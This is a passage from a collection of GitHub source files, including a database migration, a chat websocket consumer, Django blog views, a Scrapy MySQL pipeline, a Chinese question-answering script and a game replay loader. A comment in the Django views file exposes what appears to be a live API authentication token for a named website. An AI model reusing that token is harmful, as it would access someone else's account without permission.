10:36:34.585394\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '7557320529cc'\ndown_revision = 'dd8e86966ba4'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('keyboards', sa.Column('creator_id', sa.Integer(), nullable=True))\n op.create_foreign_key(None, 'keyboards', 'flasklogin-users', ['creator_id'], ['id'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'keyboards', type_='foreignkey')\n op.drop_column('keyboards', 'creator_id')\n # ### end Alembic commands ###\n","repo_name":"Kei-Eff/guided_side_app","sub_path":"migrations/versions/7557320529cc_added_one_to_many_relationship.py","file_name":"7557320529cc_added_one_to_many_relationship.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18051474466","text":"import json\nfrom channels.consumer import AsyncConsumer\nfrom channels.generic.websocket import AsyncJsonWebsocketConsumer,WebsocketConsumer\nfrom asgiref.sync import async_to_sync\n\nclass ChatRoomConsumer(WebsocketConsumer):\n def websocket_connect(self,event):\n self.room_name = self.scope['url_route']['kwargs']['room_name']\n self.room_group_name = 'room_%s'%self.room_name\n\n async_to_sync (self.channel_layer.group_add)(\n self.room_group_name,\n self.channel_name\n )\n self.accept()\n \n print('room name:',self.room_group_name)\n print('channel name:',self.channel_name)\n \n #message to room\n def websocket_receive(self, event):\n message = event['text'].split(':')\n username = message[2]\n username = username[1:len(username)-2]\n message = message[1].split(',')[0]\n message = message[1:len(message)-1]\n print('message:',message)\n \n async_to_sync (self.channel_layer.group_send)(\n self.room_group_name,\n {\n 'type': 'websocket_message',\n \"message\": message,\n 'username': username,\n }\n )\n #message to websocket\n def websocket_message(self, event):\n message = event['message']\n username = event['username']\n\n self.send(text_data=json.dumps({\n 'type': 'websocket.send',\n 'message': message,\n 'username': username,\n }))\n\n print('chatroom_message:',event)","repo_name":"dewanshiPaul/VideoChat-app","sub_path":"VideoChat/base/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8187615690","text":"from pybricks import ev3brick as brick\nfrom pybricks.tools import print, wait, StopWatch\nfrom pybricks.parameters import Stop\nfrom sandwichbot import SandwichBot\n\nclass TrafficMission():\n \"\"\"\n Class to lift traffic module.\n \"\"\"\n IMAGE_PATH = \"assets/swing.jpg\"\n\n def __init__(self, bot:SandwichBot):\n self.image_path = TrafficMission.IMAGE_PATH\n self.bot = bot\n\n def run(self):\n brick.sound.beep()\n self.bot.attachment_motor.reset_angle(0)\n self.bot.drive_distance(1000, 200)\n brick.sound.beep(1000,150,50)\n\n # move arm up while driving to swing\n self.bot.attachment_motor.run_angle(360*3, -1300, Stop.BRAKE, False)\n\n self.bot.drive_distance(900, 100)\n brick.sound.beep(1000,150,50)\n self.bot.drive_distance(-300, 100)\n\n # move arm further up for elevator\n self.bot.attachment_motor.run_angle(360*3, -600, Stop.BRAKE, False)\n\n # head to elevator and side 
chop\n self.bot.turn_to(-70)\n self.bot.drive_distance(750, 100)\n self.bot.drive_time(-300,300,500)\n brick.sound.beep(1000,150,50)","repo_name":"Team-Sandwich/LineFollowing","sub_path":"missions/traffic_mission.py","file_name":"traffic_mission.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31434716736","text":"\ndef word_count(str):\n counts = dict()\n words = str.split()\n\n for word in words:\n if word in counts:\n counts[word] += 1\n else:\n counts[word] = 1\n\n return counts\n \nprint( word_count('Falar é fácil. Mostre-me o código'+'É fácil escrever código. Difícil é escrever código que funcione'))\n","repo_name":"AnaCarolinaMoreira/Vetor-de-Palavras","sub_path":"foo4.py","file_name":"foo4.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24630060463","text":"from django.contrib.auth.decorators import login_required\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom django.http import Http404\nfrom django.shortcuts import render, get_object_or_404, redirect\n\nfrom django.db.models import Count\nfrom taggit.models import Tag\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\nfrom .forms import BlogPostModelForm\nfrom .models import BlogPost\n\nfrom taggit.models import Tag\n\nfrom .serializers import SnippetSerializer, UserSerializer\nfrom rest_framework import generics ,permissions \nfrom django.contrib.auth.models import User\nfrom .permissions import IsOwnerOrReadOnly\nfrom rest_framework.decorators import api_view # new\nfrom rest_framework.response import Response # new\nfrom rest_framework.reverse import reverse # new\nfrom rest_framework.permissions import IsAuthenticated\n\n\ndef blog_post_list_view(request, tag_slug=None):\n\n qs = BlogPost.objects.all().published() \n \n tag = None\n \n if tag_slug:\n tag = get_object_or_404(Tag, slug=tag_slug)\n qs = qs.filter(tags__in=[tag])\n paginator = Paginator(qs, 5) # 5 posts in each page \n \n \n page = request.GET.get('page') \n try: \n qs = paginator.page(page) \n except PageNotAnInteger: \n # If page is not an integer deliver the first page \n qs = paginator.page(1) \n except EmptyPage: \n # If page is out of range deliver last page of results\n qs = paginator.page(paginator.num_pages)\n \n\n #if request.user.is_authenticated:\n # my_qs = BlogPost.objects.filter(user=request.user)\n # qs = (qs | my_qs).distinct()\n template_name = 'blog/list.html'\n context = {'page': page,'object_list': qs,'tag': tag}\n return render(request, template_name, context) \n\ndef blog_post_detail_view(request, slug):\n \n obj = get_object_or_404(BlogPost, slug=slug)\n template_name = 'blog/detail.html'\n \n post_tags_ids = obj.tags.values_list('id', flat=True)\n \n similar_posts = BlogPost.objects.all().published().filter(tags__in=post_tags_ids)\\\n .exclude(id=obj.id)\n similar_posts = similar_posts.annotate(same_tags=Count('tags'))\\\n .order_by('-same_tags',)[:4]#'-publish'\n\n context = {\"object\": obj, \"similar_posts\": similar_posts}\n\n\n\n return render(request, template_name, context) \n\n\n\n\n\n\n\n\n\n\n\n# @login_required\n@staff_member_required\ndef blog_post_create_view(request):\n\n form = BlogPostModelForm(request.POST or None, request.FILES or None)\n if form.is_valid():\n obj = form.save(commit=False)\n obj.user = request.user\n obj.save()\n form = 
BlogPostModelForm()\n template_name = 'form.html'\n context = {'form': form}\n return render(request, template_name, context) \n\n\n\n\n\n\n@staff_member_required\ndef blog_post_update_view(request, slug):\n obj = get_object_or_404(BlogPost, slug=slug)\n form = BlogPostModelForm(request.POST or None, instance=obj)\n if form.is_valid():\n form.save()\n template_name = 'form.html'\n context = {\"title\": f\"Update {obj.title}\", \"form\": form}\n return render(request, template_name, context) \n\n\n@staff_member_required\ndef blog_post_delete_view(request, slug):\n obj = get_object_or_404(BlogPost, slug=slug)\n template_name = 'blog/delete.html'\n if request.method == \"POST\":\n obj.delete()\n return redirect(\"/blog\")\n context = {\"object\": obj}\n return render(request, template_name, context) \n\n\n\n@api_view(['GET'])\ndef api_root(request, format=None):\n return Response({\n 'users': reverse('blog:user-list', request=request, format=format),\n 'snippets': reverse('blog:snippet-list', request=request, format=format)\n \n })\n\nclass SnippetList(generics.ListCreateAPIView):\n queryset = BlogPost.objects.all()\n serializer_class = SnippetSerializer\n def perform_create(self, serializer): # new\n serializer.save(owner=self.request.user)\n\nclass SnippetDetail(generics.RetrieveUpdateDestroyAPIView):\n queryset = BlogPost.objects.all()\n serializer_class = SnippetSerializer\n#For token auth python manage.py drf_create_token vitor\n#will need https://www.technozod.com/blog/api/snippets/38/ 'Authorization: Token c5c7148ecae080a1122a6b1d2372ca0443077d6a'\n#permission_classes = (IsAuthenticated,) \n #permission_classes = (permissions.IsAuthenticatedOrReadOnly,)\n permission_classes = (permissions.IsAuthenticatedOrReadOnly,\n IsOwnerOrReadOnly,)\n \nclass UserList(generics.ListAPIView): # new\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n\nclass UserDetail(generics.RetrieveAPIView): # new\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n \n","repo_name":"ubermachine/deployedblog","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4248810093","text":"from typing import Any\n\nfrom sqlalchemy.ext.asyncio import AsyncSession\n\n\nclass DataGenerator:\n \"\"\"\n A common base for all generators of testdata\n \"\"\"\n first_names = [\"Eva\", \"Mark\", \"Jonathan\", \"Christine\", \"Sebatian\", \"Ava\",\n \"Blake\", \"Andrea\", \"Joanne\", \"Frank\", \"Emma\", \"Ruth\", \"Leah\",\n \"Jacob\", \"Megan\", \"Richard\", \"Piers\", \"Felicity\", \"Melanie\",\n \"Max\", \"Maria\", \"Anne\", \"Anne\", \"Charles\", \"Jacob\"]\n last_names = [\"Andrews\", \"Hayes\", \"Martinez\", \"Evans\", \"Pratt\", \"Vaughan\",\n \"Roberts\", \"Forsyth\", \"Walker\", \"Baker\", \"Avery\", \"Davidson\",\n \"Wilkins\", \"Morrison\", \"Ball\", \"Paige\", \"Gray\", \"Marshall\",\n \"Langdon\", \"McLean\", \"James\", \"Anderson\", \"Clark\", \"Henderson\",\n \"Scott\"]\n emails = [\"gmail.com\", \"outlook.com\", \"yahoo.com\", \"hotmail.com\"]\n\n def __init__(self, session: AsyncSession):\n \"\"\"\n Initializes the data list and assigns the session to use.\n\n :param session: The session to use to add the data to the database\n :type session: AsyncSession\n \"\"\"\n self.data: list[Any] = []\n self.session: AsyncSession = session\n\n def add_to_db(self) -> None:\n \"\"\"\n Adds the entirety of the data list to the database. 
No commit is done.\n\n        :return: None\n        \"\"\"\n        self.session.add_all(self.data)\n","repo_name":"SELab-2/OSOC-4","sub_path":"backend/app/tests/utils_for_tests/DataGenerator.py","file_name":"DataGenerator.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"27954193052","text":"#coding:utf-8\n\nclass Option():\n    \"\"\"\n    Defines a command option used in an instruction\n    \"\"\"\n    def __init__(self,names,hasValue=0):\n        \"\"\"\n        names: str/list/tuple, e.g. [\"-a\",\"-A\",\"--aAa\"]\\n\n        hasValue: int, 0 = takes no value, 1 = requires a value, 2 = takes a value if available\n        \"\"\"\n        if isinstance(names,str):\n            names=[names]\n        self.names=names\n        self.hasValue=hasValue\n\n    def __str__(self):\n        return \"/\".join(self.names)\n\n    __repr__=__str__\n\n    def isLongOrShort(self):\n        \"\"\"\n        Returns an int: 0 = short, 1 = long, 2 = both short and long\n        \"\"\"\n        hasShort=False\n        hasLong=False\n        for n in self.names:\n            per=n[:2]\n            if per==\"--\":\n                hasLong=True\n            elif per.startswith(\"-\"):\n                hasShort=True\n        if hasLong and hasShort:\n            return 2\n        if hasShort:\n            return 0\n        elif hasLong:\n            return 1\n        else:\n            raise Exception(\"%s is not a valid opt\"%str(self))\n    \n    def isMatch(self,t):\n        for n in self.names:\n            if t.startswith(n):\n                return True\n        return False\n\nclass CommandParser():\n    '''\n    Parses a single instruction line\\n\n    Example: .cmd param1 param2 -s1 -s2 s2val --l lval1 lval2 lval3\n    '''\n    #text=\"\"\n    #command={}\n    commandPrefix=[\".\",\"。\",\"-\",\"!\",\"!\",\"/\"]\n    #special=[]\n    #cons=[]\n    def __init__(self):\n        self.command={}\n        self.shortspecial=[]\n        self.longspecial=[]\n        #self.special=[]\n        self.cons=[]\n        self.raw=\"\"\n\n    def __getitem__(self,key):\n        return self.command.get(key,None)\n\n    @staticmethod\n    def isCommand(t):\n        temp=t.lstrip()\n        if t==\"\":\n            return False\n        return temp[0] in CommandParser.commandPrefix\n\n    def addSpecial(self,option):\n        sl=option.isLongOrShort()\n        if sl==0:\n            self.shortspecial.append(option)\n        elif sl==1:\n            self.longspecial.append(option)\n        elif sl==2:\n            self.shortspecial.append(option)\n            self.longspecial.append(option)\n\n    def setSpecial(self,s):\n        for option in s:\n            self.addSpecial(option)\n        #self.special=s\n\n    def hasSpecial(self):\n        return len(self.shortspecial)!=0 or len(self.longspecial)!=0\n\n    def opt(self,names,hasValue=0):\n        option=Option(names,hasValue)\n        self.addSpecial(option)\n        return self\n\n    def getCommand(self,t):\n        if t==\"\":\n            return False\n        r=CommandParser.isCommand(t)\n        if r:\n            self.cons=t.strip().split()\n            self.command[\"type\"]=self.cons[0][0]\n            self.command[\"command\"]=self.cons[0][1:]\n            self.raw=t\n            if self.command[\"command\"]==\"\":\n                return False\n        return r\n    \n    def separateCommand(self,cmd):\n        if self.command[\"command\"].startswith(cmd):\n            return self.command[\"command\"][len(cmd):]\n        return None\n    \n    def parse(self,s=()):\n        self.setSpecial(s)\n        self.command[\"params\"]=[]\n        con=self.cons[1:]\n        if not self.hasSpecial():\n            self.command[\"params\"]=con\n            return\n        while len(con)!=0:\n            if not con[0].startswith(\"-\"):\n                self.command[\"params\"].append(con[0])\n                con=con[1:]\n            else:\n                matched=False\n                if con[0].startswith(\"--\"):\n                    for ls in self.longspecial:\n                        if ls.isMatch(con[0]):\n                            matched=True\n                            opt=con[0].lstrip(\"-\")\n                            con=con[1:]\n                            if ls.hasValue>0:\n                                self.command[opt]=[]\n                                while len(con)!=0 and not con[0].startswith(\"-\"):\n                                    self.command[opt].append(con[0])\n                                    con=con[1:]\n                                if ls.hasValue==2 and len(self.command[opt])==0:\n                                    self.command[opt]=True\n                            else:\n                                self.command[opt]=True\n                            break\n                else:\n                    for ss in self.shortspecial:\n                        if ss.isMatch(con[0]):\n                            matched=True\n                            opt=con[0].lstrip(\"-\")\n                            con=con[1:]\n                            if 
ss.hasValue==0 or len(con)==0 or (ss.hasValue==2 and con[0].startswith(\"-\") ):\n                            self.command[opt]=True\n                        else:\n                            self.command[opt]=con[0]\n                            con=con[1:]\n                        break\n                if not matched:\n                    self.command[\"params\"].append(con[0])\n                    con=con[1:]\n        '''\n        flag=self.hasSpecial()\n        isSpecial=False\n        isLongSp=None\n        for x in range(len(con)):\n            if con[x][0]==\"-\" and flag and con[x].lstrip(\"-\") in self.special:\n                isLongSp=None\n                if con[x].startswith(\"--\"):\n                    isLongSp=con[x].lstrip(\"-\")\n                    self.command[isLongSp]=[]\n                elif x+1  4:\n        score -= 1 \n    if company_exists:\n        score -= 1 \n    score = max(score, 1)\n\n    # create a new JobOffer\n    new_offer = JobOffer(\n        provider=provider,\n        url=url,\n        title=offer.title,\n        description=description,\n        author=offer.author,\n        company=information.company_name if information.company_name else \"\",\n        date=offer.date,\n        score=score,\n        positives=\";\".join(categories.positive),\n        negatives=\";\".join(categories.negative),\n        positive_keywords=\";\".join(keywords.green_flag_keywords),\n        negative_keywords=\";\".join(keywords.red_flag_keywords),\n        email_text='EmailText',\n        website_copy=offer.screenshot,\n    )\n\n    db.add(new_offer)\n    db.commit()\n\n    print(offer.title, categories, keywords, information)\n\n","repo_name":"KrysiaEK/FakeJobsFinder","sub_path":"backend/app/app/worker/web_scrapper.py","file_name":"web_scrapper.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"37911090795","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\nimport pymysql\nimport logging\nimport pymysql.cursors\nfrom twisted.enterprise import adbapi\nlogger = logging.getLogger(__name__)\n\n\nclass AppcommentsspiderPipeline(object):\n    def __init__(self, dbpool):\n        self.dbpool = dbpool\n\n    @classmethod\n    def from_settings(cls, settings):\n        \"\"\"\n        Load the database configuration\n        :param settings:\n        :return:\n        \"\"\"\n        dbparms = dict(\n            host=settings[\"MYSQL_HOST\"],\n            db=settings[\"MYSQL_DBNAME\"],\n            user=settings[\"MYSQL_USER\"],\n            passwd=settings[\"MYSQL_PASSWORD\"],\n            charset='utf8',  # MySQL expects 'utf8', not 'utf-8'\n            cursorclass=pymysql.cursors.DictCursor,\n            use_unicode=True,\n        )\n        dbpool = adbapi.ConnectionPool(\"pymysql\", **dbparms)  # use the imported pymysql driver\n        return cls(dbpool)\n\n    \"\"\"\n    An Item Pipeline is a \"project pipeline\": once an Item is generated, it is automatically sent to the Item Pipeline for processing.\n    Common uses: cleaning HTML data; validating scraped data and checking scraped fields; de-duplicating and dropping repeated content; storing the scraped results in a database.\n    To implement an Item Pipeline, just define a class that implements the process_item method.\n    Once enabled, the Item Pipeline calls this method automatically; the method must return a dict or an Item object containing the data, or raise a DropItem exception.\n    \"\"\"\n    def process_item(self, item, spider):\n        \"\"\"\n        Use twisted to make the MySQL insert run asynchronously\n        :param item:\n        :param spider:\n        :return:\n        \"\"\"\n        for field in item.fields:\n            item.setdefault(field, '')\n        query = self.dbpool.runInteraction(self.do_insert, item)\n        # handle errors\n        query.addErrback(self.handle_error, item, spider)\n\n    def handle_error(self, failure, item, spider):\n        # write exceptions from the async insert to the log\n        logging.error(failure)\n\n    def do_insert(self, cursor, item):\n        \"\"\"\n        Perform the actual insert:\n        build the appropriate SQL statement for each item and insert it into MySQL\n        :param cursor:\n        :param item:\n        :return:\n        \"\"\"\n        insert_sql, params = item.get_insert_sql()\n        cursor.execute(insert_sql, params)\n\n","repo_name":"490/app_comments_spider-master","sub_path":"AppCommentsSpider/AppCommentsSpider/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"40854983821","text":"import numpy as np\r\nimport re\r\nimport jieba\r\nimport jieba.analyse\r\nimport sys\r\nimport math\r\nfrom gensim.models import Word2Vec\r\nimport json\r\n# from keras.preprocessing import sequence \r\n# from keras.optimizers import SGD, RMSprop, Adagrad \r\n# from keras.utils import np_utils \r\n# from keras.models import Sequential \r\n# from keras.layers.core import Dense, Dropout, Activation \r\n# from keras.layers.embeddings import Embedding \r\n# from keras.layers.recurrent import LSTM, GRU \r\nfrom keras.models import load_model\r\n\r\n\r\ndef spiltword(sentencelist):\r\n wordlist = []\r\n # print('\\nSplitting word\\n')\r\n for index, storage in enumerate(sentencelist):\r\n wordsplit = list(jieba.cut(storage, cut_all=False))\r\n wordlist.append(wordsplit)\r\n return wordlist\r\n\r\n\r\ndef turnwordtovector(wordlist):\r\n # print('\\nLoading word2vec model...\\n')\r\n model = Word2Vec.load('Word60.model')\r\n # print('\\nTurning word to vector\\n')\r\n vectorlist = []\r\n for index, data in enumerate(wordlist):\r\n tmp = []\r\n for item in data:\r\n if item in model.vocab:\r\n tmp.append(model[item].tolist())\r\n vectorlist.append(tmp)\r\n # progressbar(index,len(wordlist))\r\n return vectorlist\r\n\r\ndef ifSimilar(vec1,vec2):\r\n num = float(np.sum(vec1 * vec2)) # 若为行向量则 A * B.T  \r\n denom = np.linalg.norm(vec1) * np.linalg.norm(vec2)\r\n if denom == 0:\r\n return 0\r\n cos = num / denom # 余弦值  \r\n sim = 0.5 + 0.5 * cos # 归一化  \r\n return sim\r\n\r\n\r\ndef loaddata():\r\n f = open('baike.txt', 'r', encoding='utf-8')\r\n r = f.read()\r\n # print(r[0])\r\n data = re.sub(r'\\s+', ' ', r)\r\n data = re.split('[!?。;;!?]', data)\r\n model = load_model('0.608113.h5')\r\n return data, model\r\n '''\r\n f2=open('baike-process.txt','w')\r\n f2.write(str(data))\r\n f2.close()\r\n '''\r\n\r\n\r\n# print(data[0:10])\r\ndef getanswer(question, data, model):\r\n vec_model = Word2Vec.load('Word60.model')\r\n seg_list = jieba.lcut_for_search(question)\r\n print(seg_list)\r\n numberofpossibleanswer = 5\r\n cntlist = []\r\n ####################################\r\n #第一步删选\r\n for index, item in enumerate(data):\r\n cnt = 0\r\n for item2 in seg_list:\r\n\r\n if item2 in vec_model.vocab:\r\n vec1 = vec_model[item2].tolist()\r\n sentence = jieba.lcut_for_search(item)\r\n for item3 in sentence:\r\n if item3 in vec_model.vocab:\r\n vec2 = vec_model[item3].tolist()\r\n sim=ifSimilar(np.array(vec1), np.array(vec2))\r\n if sim>0.9:\r\n if item2 != item3:\r\n cnt = cnt+sim**10\r\n continue\r\n if item2 in item:\r\n cnt = cnt + 1\r\n if len(item)!=0:\r\n cntlist.append(cnt/len(item)**0.3)\r\n else:\r\n cntlist.append(0)\r\n ###############################\r\n\r\n\r\n cntarray = np.array(cntlist)\r\n indexlist = np.argsort(cntarray)\r\n indexlist = indexlist.tolist()\r\n indexlist.reverse()\r\n sentencelist = []\r\n answerlist = []\r\n\r\n ##########################\r\n #适当切分再删选\r\n for i in range(numberofpossibleanswer):\r\n if ',' in data[indexlist[i]] or ',' in data[indexlist[i]]:\r\n tmp = re.findall(r'(?<=[,\\^,\\s])(?=([^,,\\s]+[,,\\s][^,,\\s]+))',data[indexlist[i]])\r\n else:\r\n tmp=data[indexlist[i]]\r\n for item in tmp:\r\n if len(item)>=3:\r\n sentencelist.append(question + item)\r\n if ',' in item or ',' in item:\r\n a=re.split('[,,]',item)\r\n for item2 in a:\r\n if question+item2 not in sentencelist:\r\n words1,words2=jieba.lcut_for_search(question),jieba.lcut_for_search(item2)\r\n for word1 in words1:\r\n if word1 in words2:\r\n sentencelist.append(question 
+item2)\r\n sentencelist=list(set(sentencelist))\r\n #########################\r\n wordlist = spiltword(sentencelist)\r\n vectorlist = turnwordtovector(wordlist)\r\n xa = np.zeros((len(vectorlist), 30, 60), dtype='float64')\r\n for index1, items in enumerate(vectorlist):\r\n for index2, item2 in enumerate(items):\r\n if index2 == 30:\r\n break\r\n xa[index1][index2] = item2\r\n result = model.predict(xa)\r\n # print(result)\r\n tmp = []\r\n for i in range(len(vectorlist)):\r\n tmp.append(result[i][0])\r\n result = np.array(tmp)\r\n result = np.argsort(result)\r\n result = result.tolist()\r\n result.reverse()\r\n # print(data[indexlist[result[0]]])\r\n return '\\n'.join([sentencelist[i] for i in result][0:2])\r\n '''\r\n for i in range(numberofpossibleanswer):\r\n print('\\n')\r\n print(tmp[result[i]])\r\n print(data[indexlist[result[i]]])\r\n '''\r\n\r\n\r\ndef main():\r\n data, model = loaddata()\r\n questionlist = ['贵校的现任校长是谁?', '贵校建校在哪一年?', '贵校有多少本科专业?', '贵校校歌是什么?', '贵校坐落于哪座城市/省份?', '贵校有多少名工程院院士?',\r\n '贵校有多少学院?', '贵校总的科研经费是多少?']\r\n for question in questionlist:\r\n print('\\n')\r\n print(question)\r\n print(getanswer(question, data, model))\r\n # wordsplit=list(jieba.cut(question,cut_all=False))\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"crh19970307/BOP2017","sub_path":"script/other/question-answer-v2.py","file_name":"question-answer-v2.py","file_ext":"py","file_size_in_byte":5667,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"18600508425","text":"import re\nfrom pathlib import Path\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\nsns.set_theme(context='paper', style='whitegrid', font='Arimo')\nfacecolor = '#f8f5f0'\n\ndata_dir = Path(__file__).parents[1] / 'data'\nfig_dir = Path(__file__).parents[1] / 'figures'\n\nfig_dir.mkdir(exist_ok=True)\n\ncalls_path = data_dir / 'DP-fire_service_calls.csv.gz'\ninc_path = data_dir / 'DP-nm_incidents.csv.gz'\ncom_path = data_dir / 'DP-fire_safety_complaints.csv.gz'\n\ndf_calls = pd.read_csv(calls_path)\ndf_inc = pd.read_csv(inc_path)\ndf_com = pd.read_csv(com_path)\n\n#\n# create and save Call Type Count figure\nct_count = df_calls['Call Type'].value_counts()\n\nct_count_nm = ct_count.drop('Medical Incident')\nother_count = ct_count_nm.tail(-10).sum()\nct_count_top10 = ct_count_nm.head(10)\nct_count_top10.at['Other'] = ct_count_top10.at['Other'] + other_count\nct_count_top10 = ct_count_top10.sort_values(ascending=False)\n\nprint(f\"Total number of calls: {ct_count.sum()}\")\nprint(f\"Number of medical incidents: {ct_count['Medical Incident']}\")\nprint(f\"Number of top 10 call types (no medical incidents): {ct_count_top10.sum()}\")\n\n#print(ct_count_top10)\n\nplt.figure(facecolor=facecolor)\nsns.barplot(x=ct_count_top10.values, y=ct_count_top10.index, palette='flare')\nplt.savefig(fig_dir / 'call_type_counts.svg', bbox_inches='tight')\n\n#\n# Create and save Situation and Response count as given by the dataset of \n# \"Fire Incidents\".\n#\n# \"Fire Incidents\" are defined by non-medical incidents (but still includes\n# emergency incidents), as reported in the open data portal. 
The incident \n# numbers in this dataset occur in the Fire Service Calls dataset, and is \n# effectively a subset.\nprint(f\"Total number of (non-medical) incidents: {len(df_inc)}\")\n\ns_count = df_inc['Situation Summary'].value_counts()\nr_count = df_inc['Response Summary'].value_counts()\n\n#print(s_count)\n#print(r_count)\n\nplt.figure(facecolor=facecolor)\nsns.barplot(x=s_count.values, y=s_count.index, palette='flare')\nplt.savefig(fig_dir / 'nm_situation_counts.svg', bbox_inches='tight')\n\nplt.figure(facecolor=facecolor)\nsns.barplot(x=r_count.values, y=r_count.index, palette='flare')\nplt.savefig(fig_dir / 'nm_response_counts.svg', bbox_inches='tight')\n\n#\n# create and save Complaint Type Count figure\nprint(f\"Total number of fire safety complaints: {len(df_com)}\")\n\nc_count = df_com['Complaint Type'].value_counts()\n\n#print(c_count)\n\nplt.figure(facecolor=facecolor)\nax = sns.barplot(x=c_count.values, y=c_count.index, palette='flare')\nplt.savefig(fig_dir / 'complaint_type_counts.svg', bbox_inches='tight')\n","repo_name":"mneyrane/SF-fire-analysis","sub_path":"02-analysis/plot_counts.py","file_name":"plot_counts.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14022123047","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 23 06:23:13 2017\n\n@author: ty\n\"\"\"\n\nimport datetime\nimport os\nimport pandas\nimport sys\n\nimport h5py\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nimport math\nimport json\nimport time\nimport traceback\nimport game as generals_game\nimport random\nimport generals_map\nfrom bot_TNT import MAP_CHANNELS, update_state, generate_blank_state, pad, pretty_print\nfrom game import MAX_MAP_WIDTH, ORIGINAL_MAP_WIDTH, NUM_DIRECTIONS, NORTH, EAST, SOUTH, WEST\n\n\nimport multiprocessing\n\nMATCH_ID_REQUEST = 'http://halite.io/api/web/game?userID={}&limit={}'\nREPLAY_REQUEST = 'https://s3.amazonaws.com/halitereplaybucket/{}'\n\nMIN_REPLAY_STARS = 100\ntest = 0\n\n\ndef move_to_direction(game, move):\n start_y, start_x = game.index_to_coordinates(move['start'])\n end_y, end_x = game.index_to_coordinates(move['end'])\n return coordinates_to_direction(start_y, start_x, end_y, end_x)\n\ndef coordinates_to_direction(start_y, start_x, end_y, end_x):\n direction = NORTH\n \n if end_x - start_x == 1:\n direction = EAST\n elif end_x - start_x == -1:\n direction = WEST\n elif end_y - start_y == 1:\n direction = SOUTH\n \n return direction\n\ndef generate_target_move(game, move):\n is50 = int(move['is50'])\n start_y, start_x = game.index_to_coordinates(move['start'])\n end_y, end_x = game.index_to_coordinates(move['end'])\n return generate_target(game, start_y, start_x, end_y, end_x)\n \ndef generate_target(game, start_y, start_x, end_y, end_x):\n direction = NORTH\n \n if end_x - start_x == 1:\n direction = EAST\n elif end_x - start_x == -1:\n direction = WEST\n elif end_y - start_y == 1:\n direction = SOUTH\n \n pad_x = math.ceil(float(ORIGINAL_MAP_WIDTH - game.gmap.width) / 2.0)\n pad_y = math.ceil(float(ORIGINAL_MAP_WIDTH - game.gmap.height) / 2.0)\n return np.array([start_y + pad_y, start_x + pad_x, direction, game.gmap.height, game.gmap.width, 0, game.turn])\n\ndef generate_target_tensors(x, y, direction):\n tile_choice = np.zeros((ORIGINAL_MAP_WIDTH, ORIGINAL_MAP_WIDTH))\n direction_target = np.zeros((ORIGINAL_MAP_WIDTH, ORIGINAL_MAP_WIDTH, NUM_DIRECTIONS))\n \n tile_choice[int(y), int(x)] = 1\n 
direction_target[int(y), int(x), int(direction)] = 1\n \n return tile_choice.flatten(), direction_target.flatten()\n\ndef load_replay(replayFolder, replay_name):\n return json.load(open('{}/{}'.format(replayFolder,replay_name)))\n\ndef load_replays(threadId, replayFolder, replayNames, file_name, lock, validation_ratio=0.1):\n print(\"Initializing thread {} for loading {} files!\".format(threadId, len(replayNames)))\n start_time = time.time()\n \n for index, replay_name in replayNames:\n try:\n print('Loading {} on thread {} ({}/{}) with utilization in {} seconds'.format(replay_name, \n threadId, index, len(replayNames), time.time() - start_time))\n \n # Load replay JSON file\n replay = load_replay(replayFolder, replay_name)\n \n # Load relevant details from replay JSON file\n map_width = replay['mapWidth']\n map_height = replay['mapHeight']\n cities = replay['cities']\n cityArmies = replay['cityArmies']\n generals = replay['generals']\n mountains = replay['mountains']\n moves= replay['moves']\n afks = replay['afks']\n version = replay['version']\n players = replay['usernames']\n player_count = len(players)\n \n # Skip games that are not 1v1\n if player_count > 2:\n print(\"Skipping non-1v1 game...\")\n continue\n \n # Skip games that does not contain at least one player of atleast MIN_REPLAY_STARS\n if max(replay['stars']) < MIN_REPLAY_STARS:\n print(\"Skipping game because stars are too low...\")\n continue\n \n # Skip games with a player that quits\n if len(afks) > 0:\n print(\"Skipping game with AFK player in...\")\n continue\n \n # Initialize a Game object with starting state and players\n game = generals_game.Game.from_replay(replay, version)\n game_states = [generate_blank_state(), generate_blank_state()]\n oracle_states = [generate_blank_state(), generate_blank_state()]\n 